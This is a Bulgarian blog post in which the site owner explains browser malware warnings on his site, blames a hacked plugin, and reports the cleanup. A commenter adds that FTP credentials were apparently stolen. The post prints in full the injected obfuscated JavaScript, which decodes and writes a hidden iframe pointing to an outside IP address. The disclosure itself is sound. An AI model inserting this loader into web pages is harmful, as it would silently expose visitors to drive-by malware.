Злонамерен ли е Peter.and.Bilyana.net?

Сподели тази публикация:

Потребителите на FireFox и Chrome сигурно са забелязали страшните предупреждения, ако влязат в нашия сайт. Истината е, че пробив в сигурността на някой от plugin-ите (заподозряни са Sociable и Wordbooker) е довел до вкарването на следния „красив“ скрипт в блога:

<script>var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm
nopqrstuvwxyz0123456789+/=";var WqKY="PGlmcmFtZSBzcmM9Imh0dH
A6Ly8xOTUuMjI2LjIyMC4xMTIvfmFkbWluLy4sbW5idi90cmYucGhwP3NjaD
1zY2hlbWExJnM9a2V5d29yZCIgd2lkdGg9IjAiIGhlaWdodD0iMCIgZnJhbW
Vib3JkZXI9IjAiPjwvaWZyYW1lPg==";var K7dv="";var QXcJ,mDTZ,wk
w2,uEFX,CF6S,Vthb,VlmL="";var i=0;var base64test=/[^A-Za-z0-
9\+\/\=]/g;WqKY=WqKY.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{uE
FX=k0e0y0S.indexOf(WqKY.charAt(i++));CF6S=k0e0y0S.indexOf(Wq
KY.charAt(i++));Vthb=k0e0y0S.indexOf(WqKY.charAt(i++));VlmL=
k0e0y0S.indexOf(WqKY.charAt(i++));QXcJ=(uEFX<<2)|(CF6S>>4);m
DTZ=((CF6S&15)<<4)|(Vthb>>2);wkw2=((Vthb&3)<<6)|VlmL;K7dv=K7
dv+String.fromCharCode(QXcJ);if(Vthb!=64){K7dv=K7dv+String.f
romCharCode(mDTZ);}if(VlmL!=64){K7dv=K7dv+String.fromCharCod
e(wkw2);}QXcJ=mDTZ=wkw2="";uEFX=CF6S=Vthb=VlmL="";}while(i<W
qKY.length);document.write(unescape(K7dv)); </script>

Предприел съм нужните действия, но ще отнеме няколко дни и вече няма проблеми със сайта, но ще минат няколко дни, докато от Google вдигнат карантината. Дотогава не е проблем да се сърфира с Internet Explorer например, както и да се изключат предупрежденията във Firefox и Chrome.

Съжаляваме за неудобството и ще ви държим в течение.

UPDATE:

Сайтът вече функционира нормално. Междувременно блогът премина към нов темплейт, така че очаквайте нови промени в дизайна и занапред…


Сподели тази публикация:

Едно мнение за “Злонамерен ли е Peter.and.Bilyana.net?”

  1. Това съм го виждал и преди. Имаш някакъв агент на компа – най – вероятно от инсталиране на крак или подобно. Гепи ти паролите за FTP акаунтите и после закача се за хостинга и ти добавя въпросния код във всички папки в които има файла index.* /* – html, php, asp, jsp – поне за тези съм го виждал./ Чистиш от агенти, след това смяна на всички пароли ftp акаунтите и си те, … и те така.

Вашият коментар

Specify Facebook App ID and Secret in Super Socializer > Social Login section in admin panel for Facebook Login to work

Specify LinkedIn Client ID and Secret in Super Socializer > Social Login section in admin panel for LinkedIn Login to work

Specify GooglePlus Client ID and Secret in Super Socializer > Social Login section in admin panel for GooglePlus Login to work

Вашият имейл адрес няма да бъде публикуван.